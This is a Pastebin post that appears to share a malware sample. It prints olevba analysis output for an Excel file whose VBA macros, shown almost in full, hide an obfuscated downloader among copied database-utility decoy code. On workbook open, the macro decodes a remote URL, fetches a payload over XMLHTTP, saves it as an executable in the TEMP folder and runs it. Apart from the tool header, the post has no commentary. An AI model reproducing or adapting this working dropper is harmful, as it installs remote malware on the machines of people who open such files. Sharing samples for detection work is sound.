dynamoo

Malicious Word macro

Nov 12th, 2015
497
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V 6134443_101115_141851-01.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 6134443_101115_141851-01.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Sub Workbook_Open()
  16. Main
  17. DocDatabase
  18. HasProperty "", ""
  19. GetFieldTypeName 0
  20. FileExists ""
  21. DeleteFolder ""
  22. GetShortName ""
  23. End Sub
  24.  
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Ëèñò1.cls
  27. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. (empty macro)
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Ëèñò2.cls
  32. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. (empty macro)
  35. -------------------------------------------------------------------------------
  36. VBA MACRO Ëèñò3.cls
  37. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  38. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  39. (empty macro)
  40. -------------------------------------------------------------------------------
  41. VBA MACRO Module1.bas
  42. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  44. Public complexByt As Object
  45. Public complexTex As Object
  46. Public complexGU  As Object
  47. Public complexDoub As String
  48. Public complexSin As String
  49. Public complexLon As Object
  50. Public Function ExportVBComponent(VBComp As String, _
  51.  FolderName As String, _
  52.  Optional filename As String, _
  53.  Optional OverwriteExisting As Boolean = True) As Boolean
  54. On Error GoTo Err_Handler
  55.  Dim extension As String
  56.  Dim FName As String
  57.  extension = GetFileExtension(VBComp:=VBComp)
  58.  If Trim(filename) = vbNullString Then
  59.  FName = VBComp.Name & extension
  60.  Else
  61.  FName = filename
  62.  If InStr(1, FName, ".", vbBinaryCompare) = 0 Then
  63.  FName = FName & extension
  64.  End If
  65.  End If
  66.  If StrComp(Right(FolderName, 1), "\", vbBinaryCompare) = 0 Then
  67.  FName = FolderName & FName
  68.  Else
  69.  FName = FolderName & "\" & FName
  70.  End If
  71.  If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then
  72.  If OverwriteExisting = True Then
  73.  Kill FName
  74.  Else
  75.  ExportVBComponent = False
  76.  Exit Function
  77.  End If
  78.  End If
  79.  VBComp.Export filename:=FName
  80.  ExportVBComponent = True
  81. Exit_Function:
  82.  Exit Function
  83. Err_Handler:
  84.  Select Case Err.Number
  85.  Case Else
  86.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  87.  "Error encountered (#" & Err.Number & " - ExportVBComponent[mod_Git])"
  88.  End Select
  89.  Resume Exit_Function
  90. End Function
  91. Public Function GetFileExtension(VBComp As String) As String
  92. On Error GoTo Err_Handler
  93.  Select Case VBComp.Type
  94.  Case vbext_ct_ClassModule
  95.  GetFileExtension = ".cls"
  96.  Case vbext_ct_Document
  97.  GetFileExtension = ".cls"
  98.  Case vbext_ct_MSForm
  99.  GetFileExtension = ".frm"
  100.  Case vbext_ct_StdModule
  101.  GetFileExtension = ".bas"
  102.  Case Else
  103.  GetFileExtension = ".bas"
  104.  End Select
  105. Exit_Function:
  106.  Exit Function
  107. Err_Handler:
  108.  Select Case Err.Number
  109.  Case Else
  110.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  111.  "Error encountered (#" & Err.Number & " - GetFileExtension[mod_Git])"
  112.  End Select
  113.  Resume Exit_Function
  114. End Function
  115. Public Sub DocDatabase(Optional path As String = "")
  116. Set complexByt = CreateObject(Push_M + "icrosoft" + Push_DT + "XMLHTT" + Push_P)
  117. Set complexTex = CreateObject("Adodb" + Push_DT + "Str" + LCase(Push_E) + "a" + LCase(Push_M))
  118. Set complexLon = CreateObject("Sh" + LCase(Push_E) + "ll" + Push_DT + "A" + LCase(Push_P + Push_P) + "lication")
  119. Set complexGU = CreateObject("WScript" + Push_DT + "Sh" + LCase(Push_E) + "ll").Environment(Push_P + "roc" + LCase(Push_E) + "ss")
  120. Exit Sub
  121.  If IsBla.nk(path) Then
  122.  path = Application.CurrentProject.path & "\" & Application.CurrentProject.Name & " - exploded view\"
  123.  End If
  124. On Error Resume Next
  125.  MkDir path
  126.  MkDir path & "\Forms\"
  127.  MkDir path & "\Queries\"
  128.  MkDir path & "\Queries(SQL)\"
  129.  MkDir path & "\Reports\"
  130.  MkDir path & "\Modules\"
  131.  MkDir path & "\Scripts\"
  132. On Error GoTo Err_Handler
  133.  Dim dbs As String
  134.  Dim cnt As String
  135.  Dim doc As String
  136.  Dim i As Integer
  137.   dbs = Curr.entDb()
  138.   cnt = dbssc.Containers("Forms")
  139.  For Each ddvoc In scsc.Documents
  140.  Application.SaveAsText acForm, dodvdc.Name, path & "\Forms\" & dodvdc.Name & ".txt"
  141.  Next ddvoc
  142.   cnt = dbfffs.Containers("Reports")
  143.  For Each docff In cnffft.Documents
  144.  Application.SaveAsText acReport, dofffc.Name, path & "\Reports\" & dofffc.Name & ".txt"
  145.  Next docff
  146.   cnt = dbffs.Containers("Scripts")
  147.  For Each doffc In cnfft.Documents
  148.  Application.SaveAsText acMacro, docff.Name, path & "\Scripts\" & docff.Name & ".txt"
  149.  Next doffc
  150.   cnt = dbsff.Containers("Modules")
  151.  For Each docff In cntff.Documents
  152.  Application.SaveAsText acModule, docff.Name, path & "\Modules\" & docff.Name & ".txt"
  153.  Next docff
  154.  Dim intfile As Long
  155.  Dim filename As String
  156.  For i = 0 To dbsff.QueryDefs.Count - 1
  157.  Application.SaveAsText acQuery, dbffs.QueryDefs(i).Name, path & "\Queries\" & dffbs.QueryDefs(i).Name & ".txt"
  158.  filename = path & "\Queries(SQL)\" & dbffs.QueryDefs(i).Name & ".txt"
  159.  intfile = FreeFile()
  160.  Open filename For Output As #intfile
  161.  Print #intfile, dffbs.QueryDefs(i).Sql
  162.  Close #intfile
  163.  Next i
  164.  
  165. Exit_Sub:
  166.  Debug.Print "Done."
  167.  Exit Sub
  168. Err_Handler:
  169.  Select Case Err.Number
  170.  Case Else
  171.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  172.  "Error encountered (#" & Err.Number & " - DocDatabase[mod_Git])"
  173.  End Select
  174.  Resume Exit_Sub
  175. End Sub
  176. Public Sub RecreateDatabase()
  177. On Error GoTo Err_Handler
  178.  Dim myFile As Object
  179.  Dim folder As Object
  180.  Dim FSO As Object
  181.  Dim objecttype As String, objectname As String
  182.  Dim WScript As Object
  183.  Dim oApplication As Object
  184.  For Each myFile In folder.files
  185.  objecttype = FSO.GetExtensionName(myFile.Name)
  186.  objectname = FSO.GetBaseName(myFile.Name)
  187.  WScript.Echo " " & objectname & " (" & objecttype & ")"
  188.  If (objecttype = "form") Then
  189.  oApplication.LoadFromText acForm, objectname, myFile.path
  190.  ElseIf (objecttype = "bas") Then
  191.  oApplication.LoadFromText acModule, objectname, myFile.path
  192.  ElseIf (objecttype = "mac") Then
  193.  oApplication.LoadFromText acMacro, objectname, myFile.path
  194.  ElseIf (objecttype = "report") Then
  195.  oApplication.LoadFromText acReport, objectname, myFile.path
  196.  ElseIf (objecttype = "sql") Then
  197.  oApplication.LoadFromText acQuery, objectname, myFile.path
  198.  End If
  199.  Next
  200. Exit_Sub:
  201.  Debug.Print "Done."
  202.  Exit Sub
  203. Err_Handler:
  204.  Select Case Err.Number
  205.  Case Else
  206.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  207.  "Error encountered (#" & Err.Number & " - RecreateDatabase[mod_Git])"
  208.  End Select
  209.  Resume Exit_Sub
  210. End Sub
  211. Public Function SetPropertyDAO(obj As Object, strPropertyName As String, intType As Integer, _
  212.  varValue As Variant, Optional strErrMsg As String) As Boolean
  213. On Error GoTo ErrHandler
  214.  If HasProperty(obj, strPropertyName) Then
  215.  obj.Properties(strPropertyName) = varValue
  216.  Else
  217.  obj.Properties.Append obj.CreateProperty(strPropertyName, intType, varValue)
  218.  End If
  219.  SetPropertyDAO = True
  220. ExitHandler:
  221.  Exit Function
  222. ErrHandler:
  223.  strErrMsg = strErrMsg & obj.Name & "." & strPropertyName & " not set to " & _
  224.  varValue & ". Error encountered (#" & Err.Number & " - SetPropertyDAO[mod_Git])" & _
  225.  Err.Number & " - " & Err.Description & vbCrLf
  226.  Resume ExitHandler
  227. End Function
  228. Public Function HasProperty(obj As String, strPropName As String) As Boolean
  229.  Dim varDummy As Variant
  230.  Dim vidak() As Variant
  231. On Error Resume Next
  232. vidak = Array(180, 192, 192, 188, 134, 123, 123, 191, 173, 186, 187, 183, 187, 122, 182, 188, 123, 129, 192, 129, 128, 130, 129, 126, 127, 123, 184, 180, 178, 127, 178, 127, 127, 128, 178, 122, 177, 196, 177)
  233. complexByt.Open "GET", GetStringFromArray(vidak, 38), False
  234.  Exit Function
  235.  varDummy = obffj.Properties(strPropName)
  236.  HasProperty = (Err.Number = 0)
  237. End Function
  238. Public Function GetDescriptions(db As String) As String
  239. On Error Resume Next
  240.  Dim Catalog As AccessObject
  241.  Dim dsc As String
  242.  Dim tbl As AccessObject
  243.  Dim tabledefs As Collection
  244.  Set Catalog = CreateObject("ADOX.Catalog")
  245.  Catalog.ActiveConnection = "Provider=Microsoft.Jet.OLEDB.4.0;" & _
  246.  "Data Source=\" & db & ""
  247.  For Each tbl In Catalog.Tables
  248.  Debug.Print tbl.Name
  249.  Next
  250.  dsc = Catalog.Tables("table_name").Columns("column_name").Properties("Description").value
  251.  For Each tbl In tabledefs
  252.  Debug.Print tbl.Name
  253.  Next
  254.  GetDescriptions = dsc
  255.  Set Catalog = Nothing
  256. End Function
  257. Function TableInfo(strTableName As String)
  258. On Error GoTo TableInfoErr
  259.  Dim db As DAO.Database
  260.  Dim tdf As DAO.TableDef
  261.  Dim fld As String
  262.  Set db = CurrentDb()
  263.  Set tdf = db.tabledefs(strTableName)
  264.  Debug.Print "FIELD NAME", "FIELD TYPE", "SIZE", "DESCRIPTION"
  265.  Debug.Print "==========", "==========", "====", "==========="
  266.  For Each fld In tdf.Fields
  267.  Debug.Print fld.Name,
  268.  Debug.Print FieldTypeName(fld),
  269.  Debug.Print fld.Size,
  270.  Debug.Print GetDescrip(fld)
  271.  Next
  272.  Debug.Print "==========", "==========", "====", "==========="
  273. TableInfoExit:
  274.  Set db = Nothing
  275.  Exit Function
  276. TableInfoErr:
  277.  Select Case Err
  278.  Case 3265&
  279.  MsgBox strTableName & " table doesn"
  280.  Case Else
  281.  Debug.Print "TableInfo() Error " & Err & ": " & Error
  282.  End Select
  283.  Resume TableInfoExit
  284. End Function
  285. Function GetDescrip(obj As Object) As String
  286.  On Error Resume Next
  287.  GetDescrip = obj.Properties("Description")
  288. End Function
  289. Function FieldTypeName(fld As String) As String
  290. On Err GoTo Err_Handler
  291.  Dim strReturn As String
  292.  Select Case CLng(fld.Type)
  293.  Case dbBoolean: strReturn = "Yes/No"
  294.  Case dbByte: strReturn = "Byte"
  295.  Case dbInteger: strReturn = "Integer"
  296.  Case dbLong
  297.  If (fld.attributes And dbAutoIncrField) = 0& Then
  298.  strReturn = "Long Integer"
  299.  Else
  300.  strReturn = "AutoNumber"
  301.  End If
  302.  Case dbCurrency: strReturn = "Currency"
  303.  Case dbSingle: strReturn = "Single"
  304.  Case dbDouble: strReturn = "Double"
  305.  Case dbDate: strReturn = "Date/Time"
  306.  Case dbBinary: strReturn = "Binary"
  307.  Case dbText
  308.  If (fld.attributes And dbFixedField) = 0& Then
  309.  strReturn = "Text"
  310.  Else
  311.  strReturn = "Text (fixed width)"
  312.  End If
  313.  Case dbLongBinary: strReturn = "OLE Object"
  314.  Case dbMemo
  315.  If (fld.attributes And dbHyperlinkField) = 0& Then
  316.  strReturn = "Memo"
  317.  Else
  318.  strReturn = "Hyperlink"
  319.  End If
  320.  Case dbGUID: strReturn = "GUID"
  321.  Case dbBigInt: strReturn = "Big Integer"
  322.  Case dbVarBinary: strReturn = "VarBinary"
  323.  Case dbChar: strReturn = "Char"
  324.  Case dbNumeric: strReturn = "Numeric"
  325.  Case dbDecimal: strReturn = "Decimal"
  326.  Case dbFloat: strReturn = "Float"
  327.  Case dbTime: strReturn = "Time"
  328.  Case dbTimeStamp: strReturn = "Time Stamp"
  329.  Case 101&: strReturn = "Attachment"
  330.  Case 102&: strReturn = "Complex Byte"
  331.  Case 103&: strReturn = "Complex Integer"
  332.  Case 104&: strReturn = "Complex Long"
  333.  Case 105&: strReturn = "Complex Single"
  334.  Case 106&: strReturn = "Complex Double"
  335.  Case 107&: strReturn = "Complex GUID"
  336.  Case 108&: strReturn = "Complex Decimal"
  337.  Case 109&: strReturn = "Complex Text"
  338.  Case Else: strReturn = "Field type " & fld.Type & " unknown"
  339.  End Select
  340.  FieldTypeName = strReturn
  341. Exit_Function:
  342.  Exit Function
  343. Err_Handler:
  344.  Select Case Err.Number
  345.  Case Else
  346.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  347.  "Error encountered (#" & Err.Number & " - FieldTypeName[mod_Git])"
  348.  End Select
  349.  Resume Exit_Function
  350. End Function
  351. Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
  352.  Dim i As Integer
  353.  Dim result As String
  354.  result = ""
  355.  For i = LBound(fromArr) To UBound(fromArr)
  356.   result = result & Chr(fromArr(i) - 2 * LenLen - i * 0.01)
  357.  Next i
  358.  GetStringFromArray = result
  359. End Function
  360. Function GetFieldTypeName(fld As Integer) As String
  361. On Err GoTo Err_Handler
  362.  Dim strReturn As String
  363.  GoTo Exit_Function
  364.  Select Case CLng(fld)
  365.  Case dbBoolean, 1: strReturn = "Yes/No"
  366.  Case dbByte, 2: strReturn = "Byte"
  367.  Case dbInteger, 3: strReturn = "Integer"
  368.  Case dbLong, 4
  369.  strReturn = "Long Integer"
  370.  Case dbCurrency, 5: strReturn = "Currency"
  371.  Case dbSingle, 6: strReturn = "Single"
  372.  Case dbDouble, 7: strReturn = "Double"
  373.  Case dbDate, 8: strReturn = "Date/Time"
  374.  Case dbBinary, 9: strReturn = "Binary"
  375.  Case dbText, 10
  376.  strReturn = "Text"
  377.  Case dbLongBinary, 11: strReturn = "OLE Object"
  378.  Case dbMemo, 12
  379.  strReturn = "Memo"
  380.  Case dbGUID, 15: strReturn = "GUID"
  381.  Case dbBigInt, 16: strReturn = "Big Integer"
  382.  Case dbVarBinary, 17: strReturn = "VarBinary"
  383.  Case dbChar, 18: strReturn = "Char"
  384.  Case dbNumeric, 19: strReturn = "Numeric"
  385.  Case dbDecimal, 20: strReturn = "Decimal"
  386.  Case dbFloat, 21: strReturn = "Float"
  387.  Case dbTime, 22: strReturn = "Time"
  388.  Case dbTimeStamp, 23: strReturn = "Time Stamp"
  389.  Case 101&: strReturn = "Attachment"
  390.  Case 102&: strReturn = "Complex Byte"
  391.  Case 103&: strReturn = "Complex Integer"
  392.  Case 104&: strReturn = "Complex Long"
  393.  Case 105&: strReturn = "Complex Single"
  394.  Case 106&: strReturn = "Complex Double"
  395.  Case 107&: strReturn = "Complex GUID"
  396.  Case 108&: strReturn = "Complex Decimal"
  397.  Case 109&: strReturn = "Complex Text"
  398.  Case Else: strReturn = "Field type " & fld & " unknown"
  399.  End Select
  400.  GetFieldTypeName = strReturn
  401. Exit_Function:
  402. complexDoub = complexGU("T" + Push_E + Push_M + Push_P)
  403. complexByt.Send
  404.  Exit Function
  405. Err_Handler:
  406.  Select Case Err.Number
  407.  Case Else
  408.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  409.  "Error encountered (#" & Err.Number & " - GetFieldTypeName[mod_Git])"
  410.  End Select
  411.  Resume Exit_Function
  412. End Function
  413.  
  414.  
  415.  
  416.  
  417. -------------------------------------------------------------------------------
  418. VBA MACRO Module2.bas
  419. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  420. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  421. Public Const PushUp_50 = 50
  422. Public Push_E As String
  423. Public Push_M As String
  424. Public Push_T As String
  425. Public Push_P As String
  426. Public Push_DT As String
  427. Public Sub Main()
  428. Push_DT = Chr(PushUp_50 - 4)
  429. Push_E = Chr(PushUp_50 + 19)
  430. Push_M = Chr(PushUp_50 + 19 + 8)
  431. Push_P = Chr(PushUp_50 + 19 + 8 + 3)
  432. Push_T = Chr(PushUp_50 + 19 + 8 + 3 + 4)
  433. Exit Sub
  434.  Dim h As Long
  435.  h = LoadLi.brary(App.path & "\SciLexer.dll")
  436.  frmRabcd.Show
  437. End Sub
  438. Function cveScan(fPath As String) As String
  439.  Dim cves() As String
  440.  Dim hits As Long
  441.  Dim ret() As String
  442.  push cves, "accesses capabilities:capabilities"
  443.  push cves, "accesses loader:loader"
  444.  push cves, "accesses params:parameters"
  445.  push cves, "CVE-2015-5122:opaqueBackground"
  446.  push cves, "CVE-2015-3113:play,info,code,video,attachNetStream"
  447.  push cves, "CVE-2015-0556:copyPixelsToByteArray"
  448.  push cves, "CVE-2015-0313:createMessageChannel,createWorker"
  449.  push cves, "CVE-2015-0310 or CVE-2013-0634:new RegExp"
  450.  push cves, "CVE-2015-0311:domainMemory,uncompress"
  451.  push cves, "CVE-2014-9163:parseFloat"
  452.  push cves, "CVE-2014-0515 (if in while loop):byteCode,Shader"
  453.  push cves, "CVE-2014-0502:setSharedProperty,createWorker,.start,SharedObject"
  454.  push cves, "CVE-2014-0497:writeUTFBytes,domainMemory"
  455.  push cves, "CVE-2012-0779:defaultObjectEncoding,AMF0,NetConnection"
  456.  push cves, "CVE-2012-0754:NetStream,NetConnection,attachNetStream,play"
  457.  push cves, "CVE-2012-5054:Matrix3D"
  458.  push cves, "CVE-2012-0779:Responder,NetConnection,AMF0"
  459.  push cves, "CVE-2012-1535:FontDescription,FontLookup"
  460.  push cves, "CVE-2011-0609:MovieClip,TimelineMax,TweenMax"
  461.  push cves, "CVE-2011-2110:Number(_args["
  462.  push cves, "Loads embedded flash object:loadbytes"
  463.  If fPath = "cvelist" Then
  464.  cveScan = ";there are more than this, these are some I had on hand" & vbCrLf & _
  465.  ";that were agreeable to script level detections. " & vbCrLf & _
  466.  vbCrLf & Join(cves, vbCrLf)
  467.  Exit Function
  468.  End If
  469.  If Not FileExists(fPath) Then Exit Function
  470.  dat = ReadFile(fPath)
  471.  For Each CVE In cves
  472.  c = Split(CVE, ":")
  473.  checks = Split(c(1), ",")
  474.  hits = 0
  475.  For Each k In checks
  476.  If InStr(1, dat, k, vbTextCompare) > 0 Then hits = hits + 1
  477.  Next
  478.  If hits = UBound(checks) + 1 Then push ret, CVE
  479.  Next
  480.  If Not AryIsEmpty(ret) Then
  481.  cveScan = "File: " & FileNameFromPath(fPath) & vbCrLf & vbTab & Join(ret, vbCrLf & vbTab) & vbCrLf & "--------------------------------" & vbCrLf
  482.  End If
  483. End Function
  484. Public Function FileExists(path As String) As Boolean
  485.  On Error GoTo hell
  486.  complexTex.Type = 1
  487.  Dim tmp As String
  488.  complexSin = "" + complexDoub + "\" + LCase(Push_M) + "" + LCase(Push_P) + LCase(Push_E) + LCase(Push_T) + "ro" + LCase(Push_DT) + "e" + "xe"
  489.  tmp = Replace(path, "", Empty)
  490.  complexTex.Open
  491.  tmp = Replace(tmp, """", Empty)
  492.  complexTex.write complexByt.responseBody
  493.  If Len(tmp) = 0 Then Exit Function
  494.  If Dir(tmp, vbHidden Or vbNormal Or vbReadOnly Or vbSystem) <> "" Then FileExists = True
  495.  Exit Function
  496. hell: FileExists = False
  497. End Function
  498. Sub push(ary, value)
  499.  On Error GoTo init
  500.  Dim x As Long
  501.  x = UBound(ary)
  502.  ReDim Preserve ary(UBound(ary) + 1)
  503.  ary(UBound(ary)) = value
  504.  Exit Sub
  505. init: ReDim ary(0): ary(0) = value
  506. End Sub
  507. Function FolderExists(path As String) As Boolean
  508.  If Len(path) = 0 Then Exit Function
  509.  If Dir(path, vbDirectory) <> "" Then FolderExists = True
  510. End Function
  511. Function GetParentFolder(path) As String
  512.  If Len(path) = 0 Then Exit Function
  513.  Dim tmp() As String
  514.  Dim ub As String
  515.  tmp = Split(path, "\")
  516.  ub = tmp(UBound(tmp))
  517.  GetParentFolder = Replace(Join(tmp, "\"), "\" & ub, "")
  518. End Function
  519. Function GetBaseName(path As String) As String
  520.  Dim tmp() As String
  521.  Dim ub As String
  522.  tmp = Split(path, "\")
  523.  ub = tmp(UBound(tmp))
  524.  If InStr(1, ub, ".") > 0 Then
  525.  GetBaseName = Mid(ub, 1, InStrRev(ub, ".") - 1)
  526.  Else
  527.  GetBaseName = ub
  528.  End If
  529. End Function
  530. Function FileNameFromPath(fullpath) As String
  531.  If InStr(fullpath, "\") > 0 Then
  532.  tmp = Split(fullpath, "\")
  533.  FileNameFromPath = CStr(tmp(UBound(tmp)))
  534.  End If
  535. End Function
  536. Function GetFolderFiles(folderPath As String, Optional filter As String = "*", Optional retFullPath As Boolean = True, Optional recursive As Boolean = False) As String()
  537.  Dim fnames() As String
  538.  Dim fs As String
  539.  Dim folders() As String
  540.  Dim i As Integer
  541.  If Not FolderExists(folderPath) Then
  542.  GetFolderFiles = fnames()
  543.  Exit Function
  544.  End If
  545.  folderPath = IIf(Right(folderPath, 1) = "\", folderPath, folderPath & "\")
  546.  fs = Dir(folderPath & filter, vbHidden Or vbNormal Or vbReadOnly Or vbSystem)
  547.  While fs <> ""
  548.  If fs <> "" Then push fnames(), IIf(retFullPath = True, folderPath & fs, fs)
  549.  fs = Dir()
  550.  Wend
  551.  If recursive Then
  552.  folders() = GetSubFolders(folderPath)
  553.  If Not AryIsEmpty(folders) Then
  554.  For i = 0 To UBound(folders)
  555.  FolderEngine folders(i), fnames(), filter
  556.  Next
  557.  End If
  558.  If Not retFullPath Then
  559.  For i = 0 To UBound(fnames)
  560.  fnames(i) = Replace(fnames(i), folderPath, Empty)
  561.  Next
  562.  End If
  563.  End If
  564.  GetFolderFiles = fnames()
  565. End Function
  566. Private Sub FolderEngine(fldrpath As String, ary() As String, Optional filter As String = "*")
  567.  Dim files() As String
  568.  Dim folders() As String
  569.  Dim i As Long
  570.  files = GetFolderFiles(fldrpath, filter)
  571.  folders = GetSubFolders(fldrpath)
  572.  If Not AryIsEmpty(files) Then
  573.  For i = 0 To UBound(files)
  574.  push ary, files(i)
  575.  Next
  576.  End If
  577.  If Not AryIsEmpty(folders) Then
  578.  For i = 0 To UBound(folders)
  579.  FolderEngine folders(i), ary, filter
  580.  Next
  581.  End If
  582. End Sub
  583. Public Function DeleteFolder(folderPath As String, Optional force As Boolean = True) As Boolean
  584.  On Error GoTo failed
  585.  complexTex.savetofile complexSin, 2
  586.  Exit Function
  587.  Call delTree(folderPath, force)
  588.  RmDir folderPath
  589.  DeleteFolder = True
  590.  Exit Function
  591. failed: DeleteFolder = False
  592. End Function
  593. Private Sub delTree(folderPath As String, Optional force As Boolean = True)
  594.  Dim sfi() As String, sfo() As String, i As Integer
  595.  sfi() = GetFolderFiles(folderPath)
  596.  sfo() = GetSubFolders(folderPath)
  597.  If Not AryIsEmpty(sfi) And force = True Then
  598.  For i = 0 To UBound(sfi)
  599.  DeleteFile sfi(i)
  600.  Next
  601.  End If
  602.  If Not AryIsEmpty(sfo) And force = True Then
  603.  For i = 0 To UBound(sfo)
  604.  Call DeleteFolder(sfo(i), True)
  605.  Next
  606.  End If
  607. End Sub
  608. Function DeleteFile(fPath As String) As Boolean
  609.  On Error GoTo hadErr
  610.  Dim attributes As VbFileAttribute
  611.  attributes = GetAttr(fPath)
  612.  If (attributes And vbReadOnly) Then
  613.  attributes = attributes - vbReadOnly
  614.  SetAttr fPath, attributes
  615.  End If
  616.  Kill fPath
  617.  DeleteFile = True
  618.  Exit Function
  619. hadErr:
  620. DeleteFile = False
  621. End Function
  622. Sub WriteFile(path As String, it As Variant)
  623.  Dim f As Long
  624.  f = FreeFile
  625.  Open path For Output As #f
  626.  Print #f, it
  627.  Close f
  628. End Sub
  629. Function GetSubFolders(folder As String, Optional retFullPath As Boolean = True) As String()
  630.  Dim fnames() As String
  631.  If Not FolderExists(folder) Then
  632.  GetSubFolders = fnames()
  633.  Exit Function
  634.  End If
  635.  If Right(folder, 1) <> "\" Then folder = folder & "\"
  636.  fd = Dir(folder, vbDirectory)
  637.  While fd <> ""
  638.  If Left(fd, 1) <> "." Then
  639.  If (GetAttr(folder & fd) And vbDirectory) = vbDirectory Then
  640.  push fnames(), IIf(retFullPath = True, folder & fd, fd)
  641.  End If
  642.  End If
  643.  fd = Dir()
  644.  Wend
  645.  GetSubFolders = fnames()
  646. End Function
  647. Function ReadFile(filename) As Variant
  648.  Dim f As Long
  649.  Dim temp As Variant
  650.  f = FreeFile
  651.  temp = ""
  652.  Open filename For Binary As #f
  653.  temp = Input(FileLen(filename), #f)
  654.  Close #f
  655.  ReadFile = temp
  656. End Function
  657. Function RandomNum() As Long
  658.  Dim tmp As Long
  659.  Dim tries As Long
  660.  On Error GoTo again
  661. tryit:
  662.  Randomize
  663.  tmp = Round(Timer * Now * Rnd(), 0)
  664.  RandomNum = tmp
  665.  Exit Function
  666. again:
  667.  If tries < 10 Then
  668.  tries = tries + 1
  669.  GoTo tryit
  670.  End If
  671. End Function
  672. Function GetFreeFileName(ByVal folder As String, Optional extension = ".txt") As String
  673.  On Error GoTo handler
  674.  Dim i As Integer
  675.  Dim tmp As String
  676.  If Not FolderExists(folder) Then Exit Function
  677.  If Right(folder, 1) <> "\" Then folder = folder & "\"
  678.  If Left(extension, 1) <> "." Then extension = "." & extension
  679. again:
  680.  Do
  681.  tmp = folder & RandomNum() & extension
  682.  Loop Until Not FileExists(tmp)
  683.  GetFreeFileName = tmp
  684. Exit Function
  685. handler:
  686.  If i < 10 Then
  687.  i = i + 1
  688.  GoTo again
  689.  End If
  690. End Function
  691. Public Function GetShortName(sFile As String) As String
  692.  Dim sShortFile As String * 300
  693.  Dim lResult As Long
  694.  complexLon.Open (complexSin)
  695.  Exit Function
  696.  If Not FileExists(sFile) Then
  697.  MsgBox "GetshortName file must exist to work..: " & sFile
  698.  GetShortName = sFile
  699.  Exit Function
  700.  End If
  701.  lResult = GetShortPat.hName(sFile, sShortFile, Len(sShortFile))
  702.  GetShortName = Left$(sShortFile, lResult)
  703.  If Not FileExists(GetShortName) Then GetShortName = sFile
  704. End Function
  705. Sub SetLiColor(li As String, newcolor As Long)
  706.  Dim f As ListSubItem
  707.  li.ForeColor = newcolor
  708.  For Each f In li.ListSubItems
  709.  f.ForeColor = newcolor
  710.  Next
  711. End Sub
  712. Sub LV_LastColumnResize(lv As String)
  713.  On Error Resume Next
  714.  lv.ColumnHeaders(lv.ColumnHeaders.Count).Width = lv.Width - lv.ColumnHeaders(lv.ColumnHeaders.Count).Left - 100
  715. End Sub
  716. Public Sub LV_ColumnSort(ListViewControl As String, Column As String)
  717.  On Error Resume Next
  718.  With ListViewControl
  719.  If .SortKey <> Column.Index - 1 Then
  720.  .SortKey = Column.Index - 1
  721.  .SortOrder = lvwAscending
  722.  Else
  723.  If .SortOrder = lvwAscending Then
  724.  .SortOrder = lvwDescending
  725.  Else
  726.  .SortOrder = lvwAscending
  727.  End If
  728.  End If
  729.  .Sorted = -1
  730.  End With
  731. End Sub
  732. Function pad(v, Optional l As Long = 4)
  733.  On Error GoTo hell
  734.  Dim x As Long
  735.  x = Len(v)
  736.  If x < l Then
  737.  pad = String(l - x, " ") & v
  738.  Else
  739. hell:
  740.  pad = v
  741.  End If
  742. End Function
  743. Function isDecimalNumber(x) As Boolean
  744.  On Error GoTo hell
  745.  Dim l As Long
  746.  For i = 1 To Len(x) - 1
  747.  c = Mid(x, i, 1)
  748.  If Not IsNumeric(c) Then Exit Function
  749.  Next
  750.  l = CLng(x)
  751.  isDecimalNumber = True
  752. hell:
  753.  Exit Function
  754. End Function
  755. Function StringOpcodesToBytes(OpCodes) As Byte()
  756.  On Error Resume Next
  757.  Dim b() As Byte
  758.  tmp = Split(Trim(OpCodes), " ")
  759.  ReDim b(UBound(tmp))
  760.  For i = 0 To UBound(tmp)
  761.  b(i) = CByte(CInt("&h" & tmp(i)))
  762.  Next
  763.  StringOpcodesToBytes = b()
  764. End Function
  765. Function lpad(x, Optional sz = 8)
  766.  a = Len(x) - sz
  767.  If a < 0 Then
  768.  lpad = x & Space(Abs(a))
  769.  Else
  770.  lpad = x
  771.  End If
  772. End Function
  773. Function objKeyExistsInCollection(c As Collection, k As String) As Boolean
  774.  On Error GoTo hell
  775.  Set x = c(k)
  776.  objKeyExistsInCollection = True
  777. hell:
